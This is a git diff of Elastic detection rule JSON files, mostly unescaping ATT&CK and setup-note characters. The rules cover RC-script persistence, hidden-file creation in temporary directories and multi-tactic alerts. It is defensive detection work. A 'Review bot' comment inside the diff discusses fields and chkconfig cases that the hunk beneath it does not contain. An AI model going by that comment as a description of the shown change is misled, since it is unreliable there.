+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Threat: Lightning Framework",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1037",
+ "name": "Boot or Logon Initialization Scripts",
+ "reference": "https://attack.mitre.org/techniques/T1037/",
+ "subtechnique": [
+ {
+ "id": "T1037.004",
+ "name": "RC Scripts",
+ "reference": "https://attack.mitre.org/techniques/T1037/004/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "b910f25a-2d44-47f2-a873-aabdc0d355e6_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json
index 71e40cf41d9..4786091852e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json
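Review bot: The `setup` string added in this hunk says the rule needs data from Elastic Defend only, while the same file lists `endgame-*` in `index`, accepts `exec_event` in `event.action`, and tags `Data Source: Elastic Endgame`; the opening line of `setup` should read `This rule requires data coming in from Elastic Defend or Elastic Endgame.` so the stated data-source expectation matches the query. The rule also ships no `false_positives` array even though the note's False Positive Analysis names benign software installation and routine administrator use of `chkconfig`; carrying those two cases as `false_positives` entries would presumably make them visible to analysts outside the investigation guide. Lastly, the EQL carries a trailing space after the opening parenthesis in `and\n( \n`, which is presumably harmless to the parser but worth trimming for consistency with the other rule bodies. Whether this wording is inherited from the earlier versions of the rule (_103 through _108) cannot be confirmed from the visible hunks.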
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json
index 423c4b8d3b3..10dc7db398a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json
@@ -5,7 +5,7 @@
 ],
 "description": "This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised.",
 "false_positives": [
- "False positives can occur because the rules may be mapped to a few MITRE ATT\u0026CK tactics. Use the attached Timeline to determine which detections were triggered on the host."
+ "False positives can occur because the rules may be mapped to a few MITRE ATT&CK tactics. Use the attached Timeline to determine which detections were triggered on the host."
 ],
 "from": "now-24h",
 "index": [
@@ -14,7 +14,7 @@
 "interval": "1h",
 "language": "kuery",
 "license": "Elastic License v2",
- "name": "Multiple Alerts in Different ATT\u0026CK Tactics on a Single Host",
+ "name": "Multiple Alerts in Different ATT&CK Tactics on a Single Host",
 "query": "signal.rule.name:* and kibana.alert.rule.threat.tactic.id:*\n",
 "required_fields": [
 {
diff --git a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json
index 29247c906b2..9df39c28e5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json
@@ -5,7 +5,7 @@
 ],
 "description": "This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised.",
 "false_positives": [
- "False positives can occur because the rules may be mapped to a few MITRE ATT\u0026CK tactics. Use the attached Timeline to determine which detections were triggered on the host."
+ "False positives can occur because the rules may be mapped to a few MITRE ATT&CK tactics. Use the attached Timeline to determine which detections were triggered on the host."
 ],
 "from": "now-24h",
 "index": [
@@ -14,7 +14,7 @@
 "interval": "1h",
 "language": "kuery",
 "license": "Elastic License v2",
- "name": "Multiple Alerts in Different ATT\u0026CK Tactics on a Single Host",
+ "name": "Multiple Alerts in Different ATT&CK Tactics on a Single Host",
 "query": "signal.rule.name:* and kibana.alert.rule.threat.tactic.id:*\n",
 "required_fields": [
 {
diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json
index 72aaa467e66..e661c2b0b75 100644
--- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json index 1587ba04841..231827cfcf8 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json 
@@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json index aa78025620d..840eb03ae1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json 
@@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json index 1a0b0950224..7fdeea11aef 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json 
@@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json index 1e8cf48dde8..1ccb3da1962 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json
index 6db7e11bf22..3e68641b10b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json
index 59d1f69d514..d9d3de15f17 100644
--- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json
index 772de385d3f..ea48c640c66 100644
--- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Creation of Hidden Files and Directories via CommandLine", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\")\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json index 578509adbdb..f2c1f1eeb5d 100644 
--- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
